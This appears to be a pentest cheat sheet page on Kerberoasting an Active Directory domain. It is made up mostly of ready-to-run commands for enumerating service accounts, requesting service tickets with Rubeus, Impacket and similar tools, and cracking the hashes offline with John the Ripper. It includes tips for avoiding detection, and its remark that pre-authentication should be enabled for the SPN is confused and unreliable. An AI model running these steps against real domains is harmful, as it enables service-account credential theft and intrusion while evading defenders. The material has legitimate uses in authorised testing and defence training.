Kerberoast

Compromise Domain User, request TGS for service account. TGS is encrypted with hashed version of account's password. Offline cracking of service account passwords.

Kerberoast

  • Offline cracking of service account passwords. Pre-authentication should be enabled for that SPN.

  • Enumerate SPNs: The attacker enumerates accounts with SPNs, which are typically associated with service accounts.

# AD Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

# PowerView
Get-DomainUser -SPN

# Rubeus
.\Rubeus.exe kerberoast /stats


### Linux

# Metasploit framework
msf> use auxiliary/gather/get_user_spns

# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast

# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes
  • Request Service Tickets: The attacker requests a service ticket (TGS) for these SPNs.

Rubeus.exe kerberoast /user:svcadmin /simple

# To avoid detection, only request RC4 supported SPN
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

# Kerberoast all possible accounts (Bad Opsec)
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
  • Extract Ticket: The requested TGS is encrypted with the service account's password hash.

  • Crack Password: The attacker extracts the TGS from memory or logs and uses offline brute force or dictionary attacks to crack the password hash.

john.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt

Last updated